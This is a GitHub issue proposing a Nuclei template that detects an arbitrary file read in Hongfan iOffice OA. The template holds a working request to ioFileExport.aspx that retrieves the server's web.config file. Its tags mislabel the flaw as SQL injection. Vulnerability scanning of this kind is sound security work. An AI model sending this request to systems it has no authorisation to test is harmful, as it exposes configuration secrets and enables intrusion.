### ISSUE TITLE
hongfan-ioffice-iofileexport-arbitrary-file-read

### ISSUE THREAD

**Issue by SleepingBag945** [projectdiscovery/nuclei-templates#7987]
### Template Information:

hongfan-ioffice-iofileexport-arbitrary-file-read
app="红帆-ioffice"

### Nuclei Template:

```yaml
id: hongfan-ioffice-iofileexport-arbitrary-file-read
info:
  name: hongfan-ioffice-iofileexport-arbitrary-file-read
  author: SleepingBag945
  severity: medium
  description: 红帆OA ioFileExport.aspx文件存在任意文件读取漏洞，攻击者通过漏洞可以获取服务器敏感信息
  reference:
    - http://wiki.peiqi.tech/wiki/oa/%E7%BA%A2%E5%B8%86OA/%E7%BA%A2%E5%B8%86OA%20ioFileExport.aspx%20%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E8%AF%BB%E5%8F%96%E6%BC%8F%E6%B4%9E.html
  tags: hongfan,oa,sqli

http:
  - raw:
      - |
        GET /ioffice/prg/set/iocom/ioFileExport.aspx?url=/ioffice/web.config&filename=test.txt&ContentType=application/octet-stream HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36
        Accept: */*
        Accept-Encoding: gzip


    req-condition: true
    matchers:
      - type: dsl
        dsl:
          - 'status_code_1 == 200 && contains(body_1, "configuration") && contains(body_1, "configSections")'
        condition: and
```
